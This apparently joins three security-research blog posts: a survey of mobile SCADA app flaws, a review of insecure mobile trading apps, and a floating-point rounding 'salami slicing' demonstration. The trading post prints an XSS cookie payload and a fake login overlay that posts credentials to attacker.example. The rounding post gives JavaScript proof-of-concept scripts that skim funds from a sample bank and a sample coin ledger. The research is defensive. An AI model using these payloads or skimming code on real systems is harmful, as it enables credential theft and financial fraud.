Today, no one is surprised at the appearance of the Industrial Internet of Things (IIoT). The idea of putting your logging, monitoring, and even supervisory/control functions in the cloud does not sound as crazy as it did several years ago. If you look at mobile application offerings today, many more ICS-related applications are available than two years ago. Previously, we predicted that the “rapidly growing mobile development environment” would redeem the past sins of SCADA systems. The purpose of our research is to understand how the landscape has evolved and assess the security posture of SCADA systems and mobile applications in this new IIoT era.
SCADA and Mobile Applications
ICS infrastructures are heterogeneous by nature. They include several layers, each of which is dedicated to specific tasks. Figure 1 illustrates a typical ICS structure.
Figure 1: Modern ICS infrastructure including mobile apps
Mobile applications reside in several ICS segments and can be grouped into two general families: Local (control room) and Remote.
Local Applications
Local applications are installed on devices that connect directly to ICS devices in the field or process layers (over Wi-Fi, Bluetooth, or serial).
Remote Applications
Remote applications allow engineers to connect to ICS servers using remote channels, like the Internet, VPN-over-Internet, and private cell networks. Typically, they only allow monitoring of the industrial process; however, several applications allow the user to control/supervise the process. Applications of this type include remote SCADA clients, MES clients, and remote alert applications. In comparison to local applications belonging to the control room group, which usually operate in an isolated environment, remote applications are often installed on smartphones that use Internet connections or even on personal devices in organizations that have a BYOD policy. In other words, remote applications are more exposed and face different threats, including:
Unauthorized physical access to the device or “virtual” access to device data
Communication channel compromise (MiTM)
Application compromise
Table 1 summarizes the threat types.
Table 1: SCADA mobile client threat list
Attack Types
Based on the threats listed above, attacks targeting mobile SCADA applications can be sorted into two groups.
Directly/indirectly influencing an industrial process or industrial network infrastructure
This type of attack could be carried out by sending data that would be carried over to the field segment devices. Various methods could be used to achieve this, including bypassing ACL/ permissions checks, accessing credentials with the required privileges, or bypassing data validation.
Compromising a SCADA operator to unwillingly perform a harmful action on the system
The core idea is for the attacker to create environmental circumstances where a SCADA system operator could make incorrect decisions and trigger alarms or otherwise bring the system into a halt state.
Testing Approach
Similar to the research we conducted two years ago, our analysis and testing approach was based on the OWASP Mobile Top 10 2016. Each application was tested using the following steps:
Perform analysis and fill out the test checklist
Perform client and backend fuzzing
If needed, perform deep analysis with reverse engineering
We did not alter the fuzzing approach since the last iteration of this research. It was discussed in depth in our previous whitepaper, so its description is omitted for brevity.
We improved our test checklist for this assessment. It includes:
Application purpose, type, category, and basic information
Permissions
Password protection
Application intents, exported providers, broadcast services, etc.
Native code
Code obfuscation
Presence of web-based components
Methods of authentication used to communicate with the backend
Correctness of operations with sessions, cookies, and tokens
SSL/TLS connection configuration
XML parser configuration
Backend APIs
Sensitive data handling
HMI project data handling
Secure storage
Other issues
Reviewed Vendors
We analyzed 34 vendors in our research, randomly selecting SCADA application samples from the Google Play Store. We did, however, favor applications for which we were granted access to the backend hardware or software, so that a wider attack surface could be tested.
Additionally, we excluded applications whose most recent update was before June 2015, since they were likely the subject of our previous work. We only retested them if there had been an update during the subsequent two years.
Findings
We identified 147 security issues in the applications and their backends. We classified each issue according to the OWASP Top Ten Mobile risks and added one additional category for backend software bugs.
Table 4 presents the distribution of findings across categories. The “Number of Issues” column reports the number of issues belonging to each category, while the “% of Apps” column reports how many applications have at least one vulnerability belonging to each category.
Table 4. Vulnerabilities statistics
In our white paper, we provide an in-depth analysis of each category, along with examples of the most significant vulnerabilities we identified. Please download the white paper for a deeper analysis of each of the OWASP category findings.
Remediation and Best Practices
In addition to the well-known recommendations covering the OWASP Top 10 and OWASP Mobile Top 10 2016 risks, there are several actions that could be taken by developers of mobile SCADA clients to further protect their applications and systems. In the following list, we gathered the most important items to consider when developing a mobile SCADA application:
Always keep in mind that your application is a gateway to your ICS systems. This should influence all of your design decisions, including how you handle the inputs you will accept from the application and, more generally, anything that you will accept and send to your ICS system.
Avoid all situations that could leave the SCADA operators in the dark or provide them with misleading information, from silent application crashes to full subverting of HMI projects.
Follow best practices. Consider covering the OWASP Top 10, OWASP Mobile Top 10 2016, and the 24 Deadly Sins of Software Security.
Do not forget to implement unit and functional tests for your application and the backend servers, to cover at a minimum the basic security features, such as authentication and authorization requirements.
Enforce password/PIN validation to protect against threats U1-3. In addition, avoid storing any credentials on the device using unsafe mechanisms (such as in cleartext) and leverage robust and safe storing mechanisms already provided by the Android platform.
At all costs, avoid storing sensitive data on SD cards or similar partitions without ACLs. Such storage media cannot protect your sensitive data.
Provide secrecy and integrity for all HMI project data. This can be achieved by using authenticated encryption and storing the encryption credentials in the secure Android storage, or by deriving the key securely, via a key derivation function (KDF), from the application password (see the sketch after this list).
Encrypt all communication using strong protocols, such as TLS 1.2 with elliptic-curve key exchange and signatures and AEAD encryption schemes. Follow best practices, and keep updating your application as best practices evolve. Attacks always get better, and so should your application.
Catch and handle exceptions carefully. If an error cannot be recovered, ensure the application notifies the user and quits gracefully. When logging exceptions, ensure no sensitive information is leaked to log files.
If you are using Web Components in the application, think about preventing client-side injections (e.g., encrypt all communications, validate user input, etc.).
Limit the permissions your application requires to the strict minimum.
Implement obfuscation and anti-tampering protections in your application.
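As referenced in the HMI project data recommendation above, here is a minimal sketch of deriving a key from the application password with a KDF and protecting the data with authenticated encryption, using the Python cryptography package; the parameter choices are illustrative.

```python
# Minimal sketch: derive a key from the app password (PBKDF2) and protect HMI
# project data with authenticated encryption (AES-GCM). Parameters are
# illustrative; the salt and nonce are stored with the ciphertext and never reused.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

def _derive_key(password: bytes, salt: bytes) -> bytes:
    return PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                      salt=salt, iterations=600_000).derive(password)

def encrypt_project(password: bytes, plaintext: bytes) -> bytes:
    salt, nonce = os.urandom(16), os.urandom(12)
    ciphertext = AESGCM(_derive_key(password, salt)).encrypt(nonce, plaintext, None)
    return salt + nonce + ciphertext          # stored blob: salt || nonce || ciphertext+tag

def decrypt_project(password: bytes, blob: bytes) -> bytes:
    salt, nonce, ciphertext = blob[:16], blob[16:28], blob[28:]
    return AESGCM(_derive_key(password, salt)).decrypt(nonce, ciphertext, None)  # raises on tampering

blob = encrypt_project(b"app-password", b'{"hmi_project": "..."}')
print(decrypt_project(b"app-password", blob))
```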
Conclusions
Two years have passed since our previous research, and things have continued to evolve. Unfortunately, they have not evolved with robust security in mind, and the landscape is less secure than ever before. In 2015 we found a total of 50 issues in the 20 applications we analyzed and in 2017 we found a staggering 147 issues in the 34 applications we selected. This represents an average increase of 1.6 vulnerabilities per application. We therefore conclude that the growth of IoT in the era of “everything is connected” has not led to improved security for mobile SCADA applications. According to our results, more than 20% of the discovered issues allow attackers to directly misinform operators and/or directly/indirectly influence the industrial process.
In 2015, we wrote:
SCADA and ICS come to the mobile world recently, but bring old approaches and weaknesses. Hopefully, due to the rapidly developing nature of mobile software, all these problems will soon be gone.
We now concede that we were too optimistic and acknowledge that our previous statement was wrong. Over the past few years, the number of incidents in SCADA systems has increased, and the systems have become more interesting to attackers every year. Furthermore, widespread implementation of the IoT/IIoT connects more and more mobile devices to ICS networks. Thus, the industry should start to pay attention to the security posture of its SCADA mobile applications before it is too late. For the complete analysis, please download our white paper here.
Acknowledgments
Many thanks to Dmitriy Evdokimov, Gabriel Gonzalez, Pau Oliva, Alfredo Pironti, Ruben Santamarta, and Tao Sauvage for their help during our work on this research.
About Us
Alexander Bolshev
Alexander Bolshev is a Security Consultant for IOActive. He holds a Ph.D. in computer security and works as an assistant professor at Saint-Petersburg State Electrotechnical University. His research interests lie in distributed systems, as well as mobile, hardware, and industrial protocol security. He is the author of several white papers on topics of heuristic intrusion detection methods, Server Side Request Forgery attacks, OLAP systems, and ICS security. He is a frequent presenter at security conferences around the world, including Black Hat USA/EU/UK, ZeroNights, t2.fi, CONFIdence, and S4.
Ivan Yushkevich
Ivan is the information security auditor at Embedi (http://embedi.com). His main area of interest is source code analysis for applications ranging from simple websites to enterprise software. He has vast experience in banking systems and web application penetration testing.
IOActive
IOActive is a comprehensive, high-end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world-renowned consulting and research teams deliver a portfolio of specialist security services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Global 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founded in 1998, IOActive is headquartered in Seattle, USA, with global operations through the Americas, EMEA and Asia Pac regions. Visit for more information. Read the IOActive Labs Research Blog. Follow IOActive on Twitter.
Embedi
Embedi’s expertise is backed by extensive experience in the security of embedded devices, with special emphasis on attack and exploit prevention. Years of research are the genesis of the software solutions created. Embedi has developed a wide range of security products for various types of embedded/smart devices used in different fields of life and industry, such as wearables, smart home, retail environments, automotive, smart buildings, ICS, smart cities, and others. Embedi is headquartered in Berkeley, USA. Visit for more information and follow Embedi on Twitter.
Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps
By
Alejandro Hernandez
The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).
When it comes to financial cybersecurity, it’s worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized into one single financial entity; there is one point of failure rather than many, which makes them more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.
Picture taken from http://business.nasdaq.com/list/
Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.
Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Give buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.
Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.
Before I pass along my results, I’d like to share the interesting and controversial moral of the story: The app developed by a brokerage firm who suffered a data breach many years ago was shown to be the most secure one.
Scope
My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.
Devices:
iOS 10.3.3 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.
Results
Unfortunately, the results proved to be much worse than those for personal banking apps in 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.
The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.
Cleartext Passwords Exposed
In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract them, though.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easy), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link banking accounts and do not have two-factor authentication (2FA) implemented; therefore, no authorization one-time password (OTP) is sent to the user’s phone or email.
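For context, the missing control could be as simple as a one-time-password check gating sensitive actions such as linking a new bank account; the sketch below uses the pyotp package, and the account and issuer names are invented purely for illustration.

```python
# Hedged sketch of a TOTP (one-time password) check gating a sensitive action.
# Names and issuer below are illustrative only.
import pyotp

# Enrollment: generate a secret once and share it with the user's authenticator app.
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)
print("provisioning URI:", totp.provisioning_uri(name="jdoe", issuer_name="ExampleBroker"))

# At "link bank account" time: require a fresh code in addition to the password.
def authorize_bank_link(submitted_code: str) -> bool:
    return totp.verify(submitted_code, valid_window=1)   # small clock-drift tolerance

print(authorize_bank_link(totp.now()))   # True when the submitted code is current
```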
In two apps, like the following one, in addition to logging the username and password, authentication takes place through an unencrypted HTTP channel:
In another app, the new password was exposed in the logging console when a user changes the password:
Trading and Account Information Exposed
In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how generous a ransom could be.
Balances and investment portfolio leaked in logs:
Buy and sell orders leaked in detail in the logging console:
Personal information stored in configuration files:
“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:
“Favorites” watchlists leaked in the logs too:
Quoted tickers leaked:
Quoted symbol dumped in detail in the console:
Quoted instruments saved in a local SQLite database:
Account number and balances leaked:
Insecure Communication
Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of the 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require tricking the user into installing a malicious certificate on the mobile device.
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Sockets Layer) won’t enable it on the login screen, and all sensitive data will be sent and received in cleartext, without encryption:
One single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.
Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcasts) through insecure channels, which does not seem to represent a risk to the user.
Authentication and Session Management
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:
Privacy Mode
Only one trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customer’s private information displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.
However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:
It’s worth noting that not only should balances, positions, and other sensitive trading values be masked, but so should credit card information entered to fund the account:
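Masking itself is straightforward. A tiny, hypothetical sketch in JavaScript of the kind of helper a privacy mode could apply before rendering any figure:
// Hypothetical helper: hide every digit so magnitudes cannot be shoulder-surfed.
function maskIfPrivate(value, privacyMode) {
  if (!privacyMode) return String(value);
  return String(value).replace(/\d/g, '*');
}

console.log(maskIfPrivate('1,234,567.89', true));        // "*,***,***.**"
console.log(maskIfPrivate('4111 1111 1111 1111', true)); // "**** **** **** ****"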
Client-side Data Validation
In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTM attacks and inject malicious JavaScript or HTML code into the server responses. Since the Web Views in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.
XSS triggered in two different apps (<script>alert(document.cookie);</script>):
Fake HTML forms injected to deceive the user and steal credentials:
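Conceptually, an injected credential-stealing payload can be very small. The following is a hypothetical sketch (the attacker URL is a placeholder, and this is not taken from any of the tested apps) of what could be pushed into a JavaScript-enabled Web View over an unpinned connection:
// Hypothetical injected payload: overlays a fake "session expired" login form
// that posts whatever the victim types to an attacker-controlled host.
document.body.insertAdjacentHTML('afterbegin', `
  <form action="https://attacker.example/collect" method="POST"
        style="position:fixed;inset:0;background:#fff;z-index:9999;padding:2em">
    <h3>Your session has expired. Please log in again.</h3>
    <input name="user" placeholder="Username"><br>
    <input name="pass" type="password" placeholder="Password"><br>
    <button type="submit">Log in</button>
  </form>`);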
Root Detection
Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, thus, access to files, databases, and logs is complete. Once a user has full access to these elements, it’s easy to extract valuable information.
20 of the apps (95%) do not detect rooted environments. The single app (look for “the moral of the story” earlier in this article) that does detect it simply shows a warning message; it allows the user to keep using the platform normally:
Hardcoded Secrets in Code and App Obfuscation
Six Android app installers (.apk files) were easily reverse engineered into human-readable code. The rest had medium to high levels of obfuscation, such as the one shown below. The goal of obfuscation is to conceal the application’s purpose and logic (security through obscurity) in order to deter reverse engineering.
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, ten of the apps (47%) contain traces (internal hostnames and IP addresses) of the internal development and testing environments where they were built or tested:
Other Weaknesses
The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with what appears to be a chatbot inside the mobile app, but if you grab this URL and open it in a regular web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged-in user. From there, you can ask for details about your account. In other words, all you need to retrieve someone else’s private data is their email address and first name:
I haven’t had enough time to fully test this feature, but so far I have been able to extract balances and personal information.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure; thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher-risk vulnerabilities discussed in this article.
To date, only two brokerage firms have replied to our email.
Regulators and Rating Organizations
Digging into some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end-users or institutions, such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.
Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.
Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glanced at two recent reports [10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with frequent cyberattacks on the financial industry, I think these organizations should at least mention in their reviews the security mechanisms the evaluated trading platforms implement. Security controls should be a competitive advantage.
Conclusions and Recommendations
There’s still a long way to go to improve the maturity level of security in mobile trading apps.
Desktop and web platforms should also be tested and improved.
Regulators should encourage brokers to implement safeguards for a better trading environment.
In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
End users should enable all of the security mechanisms their apps offer.
Side Thought
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
Sometimes when buying something that costs $0.99 USD (99 cents) or $1.01 USD (one dollar and one cent), you may pay an even dollar. Either you or the cashier may not care about the remaining penny, and so one of you takes a small loss or profit.
Rounding at the cash register is a common practice, just as it is in programming languages when dealing with very small or very large numbers. I will describe here how an attacker can make a profit when dealing with the rounding mechanisms of programming languages.
Lack of precision in numbers
The IEEE 754 standard has defined floating-point numbers for more than 30 years. The requirements that guided the formulation of the standard for binary floating-point arithmetic provided for the development of very high-precision arithmetic.
The standard defines how operations with floating point numbers should be performed, and also defines standard behavior for abnormal operations. It identifies five possible types of floating point exceptions: invalid operation (highest priority), division by zero, overflow, underflow, and inexact (lowest priority).
We will explore what happens when inexact floating point exceptions are triggered: the rounded result of a valid operation can differ from the exact (and sometimes infinitely precise) result, and that difference may go completely unnoticed.
Rounding
Rounding takes an exact number and, if necessary, modifies it to fit in the destination’s format. Normally, programming languages do not alert for the inexact exception and instead just deliver the rounded value. Nevertheless, documentation for programming languages contains some warnings about this:
Ruby’s documentation, for example, clearly states that floating point uses a different arithmetic and is an inexact representation of real numbers.
To exemplify this matter, this is how the number 0.1 looks internally in Python:
The decimal value 0.1 cannot be represented precisely in binary, since its expansion in base 2 is infinite (repeating). Python rounds the stored value back to 0.1 before displaying it.
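The screenshot above shows Python; the same imprecision is just as easy to see in JavaScript, the language used in the examples that follow (a quick sketch):
// Asking for more significant digits reveals the IEEE 754 double actually stored for 0.1:
console.log((0.1).toPrecision(21)); // "0.100000000000000005551"
console.log(0.1 + 0.7);             // 0.7999999999999999 -- the error surfaces in ordinary arithmetic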
Salami slicing the decimals
Salami slicing refers to a series of small actions that together produce a result that would be impossible to achieve all at once. In this case, we will grab the tiny amounts hidden in the trailing decimals that the programming language ignores and use them for profit.
Let’s start to grab some decimals in a way that goes unnoticed by the programming language. Certain calculations with specific values make the differences more obvious. For example, notice what happens when using v8 (Google’s open source JavaScript engine) to add the values 0.1 plus 0.2:
Perhaps we could take some of those decimals without JavaScript noticing:
But what happens if we are greedy? How much can we take without JavaScript noticing?
That’s interesting; we learned that it is even possible to take more than what was shown, but no more than 0.00000000000000008 from that operation before JavaScript notices.
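For reference, the figures in the screenshots above can be reproduced in any JavaScript engine; a quick sketch:
console.log(0.1 + 0.2);                               // 0.30000000000000004
console.log(0.1 + 0.2 - 0.00000000000000004);         // 0.3 -- the skimmed amount goes unnoticed
console.log(0.1 + 0.2 - 0.00000000000000004 === 0.3); // true
console.log(0.1 + 0.2 - 0.0000000000000001);          // no longer displays as 0.3 -- JavaScript "notices"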
I created a sample bank application to explain this, pennies.js:
// pennies.js -- reconstructed to run end to end; the account setup and helper
// functions (not shown in the original excerpt) are filled in here.
if (typeof print === "undefined") print = console.log; // lets the script run under Node.js as well as d8
var initial_deposit = 1000000; // Account 0 starts with $1,000,000 USD
var account = [], profit = 0;
function reset_values() { account[0] = initial_deposit; account[1] = 0; } // bank account and attacker account
function print_balance(t) { print("Account 0: " + account[0].toPrecision(21) + " | Account 1: " + account[1].toPrecision(21) + " | seconds: " + t); }

// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if (account[withdraw] < 0)
    return 1; // Error! The account can not have a negative balance
  return 0;
}

// Phase 1: find the largest amount that can be taken from Account 0 without it noticing
for (i = 0.000000000000000001; i < 0.1; i += 0.0000000000000000001) {
  reset_values();
  wire(1, i, 0); // I will transfer some cents from the account 0 to the account 1
  if (account[0] == initial_deposit && i > profit) {
    profit = i;
    // print("I can grab " + profit.toPrecision(21));
  } else {
    break;
  }
}
print(" Found: " + profit.toPrecision(21));

// Phase 2: repeat the unnoticed transfer over and over
print("\n2) Let's start moving some money:");
reset_values();
start = new Date().getTime() / 1000;
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) {
    wire(1, profit, 0); // I will transfer some cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish - start);
}
The attack against it will have two phases. In the first phase, we will determine the maximum amount of decimals that we are allowed to take from an account before the language notices something is missing. This amount is related to the value from which we are taking: the higher the value, the more we can take unnoticed. Our Bank Account 0 will have $1,000,000 USD to start with, and we will deposit our profits into a secondary Account 1:
Due to the decimals being silently shifted to Account 1, the bank now believes that it has more money than it actually has.
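The threshold follows directly from the spacing of IEEE 754 doubles around the balance; a quick check (the threshold shown is approximate):
// Adjacent doubles near 1,000,000 are about 0.000000000116 apart, so anything below
// roughly half of that disappears when subtracted:
console.log(1000000 - 0.00000000005 === 1000000); // true: the withdrawal goes unnoticed
console.log(1000000 - 0.0000000001 === 1000000);  // false: the balance now visibly changes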
Another way to abuse the loss of precision involves large numbers: the problem becomes visible once an integer needs at least 17 digits, as the following quick check shows.
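// Doubles can represent every integer only up to 2^53 (about 9.007e15, 16 digits);
// beyond that, odd values snap to the nearest representable neighbour:
console.log(Number.MAX_SAFE_INTEGER);                 // 9007199254740991 (2^53 - 1)
console.log(10000000000000001 === 10000000000000000); // true: the 17-digit value is silently rounded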
Now, the sample attack application targets a cryptocurrency, fakecoin.js:
// fakecoin.js -- reconstructed to run end to end; the account setup, helper functions,
// and the phase-1 loop header (missing from the original excerpt) are filled in here.
if (typeof print === "undefined") print = console.log; // lets the script run under Node.js as well as d8
var initial_deposit = 10000000000000000; // Account 0 holds 10,000,000,000,000,000 Fakecoins
var account = [], profit = 0;
function reset_values() { account[0] = initial_deposit; account[1] = 0; } // exchange account and attacker account
function print_balance(t) { print("Account 0: " + account[0] + " | Account 1: " + account[1] + " | seconds: " + t); }

// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if (account[withdraw] < 0) {
    return 1; // Error! The account can not have a negative balance
  }
  return 0;
}

// Phase 1: find the largest whole number of Fakecoins Account 0 will not notice (loop bounds reconstructed)
for (j = 1; j < 1000; j++) {
  reset_values();
  wire(1, j, 0); // I will transfer a few cents from the account 0 to the account 1
  if (account[0] == initial_deposit && j > profit) {
    profit = j;
  } else {
    break;
  }
}
print(" Found: " + profit);

// Phase 2: repeat the unnoticed transfer over and over
reset_values();
start = new Date().getTime() / 1000;
print("\n2) Let's start moving some money");
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) {
    wire(1, profit, 0); // I will transfer my 29 cents from the account 0 to the account 1
  }
  finish = new Date().getTime() / 1000;
  print_balance(finish - start);
}
We will buy 10000000000000000 units of Fakecoin (with each coin valued at $0.00000000011 USD) for a total value of $1,100,000 USD. We will transfer one Fakecoin at a time from Account 0 to a second account that will hold our profits (Account 1). JavaScript will not notice the missing Fakecoin in Account 0, and will allow us to profit a total of approximately $2,300 USD per day:
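The core of the trick is the same rounding behavior, now applied to whole coins; a quick check:
// Doubles at the magnitude of 1e16 are spaced 2 apart, so removing a single coin
// rounds straight back to the original balance:
console.log(10000000000000000 - 1 === 10000000000000000); // true: one Fakecoin vanishes unnoticed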
Depending on the implementation, an attacker can abuse either small floating-point amounts or very large numbers to generate money out of thin air.
Conclusion
In conclusion, programmers can avoid inexact floating point exceptions with some best practices:
If you rely on values that use decimal numbers, use specialized arbitrary-precision types, such as BigDecimal in Java (BigInteger if you only need whole amounts), or keep amounts as exact integers of the smallest unit; see the sketch after this list.
Do not allow values larger than 16 digits to be stored in variables and truncate decimals, or
Use libraries that rely on quadruple precision (that is, twice the amount of regular precision).
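As a small illustration of the first point (a sketch in JavaScript, the language of the earlier examples), keeping balances as exact integer amounts of the smallest unit, here with BigInt, removes the rounding window the attack relies on:
// Balances kept as BigInt "cents": arithmetic is exact, so nothing can be skimmed.
let account = [100000000n, 0n]; // $1,000,000.00 and $0.00, expressed in cents

function wire(deposit, cents, withdraw) {
  if (account[withdraw] - cents < 0n) return 1; // insufficient funds
  account[deposit] += cents;
  account[withdraw] -= cents;
  return 0;
}

wire(1, 1n, 0);                         // move a single cent
console.log(account[0] === 100000000n); // false: the missing cent is always noticed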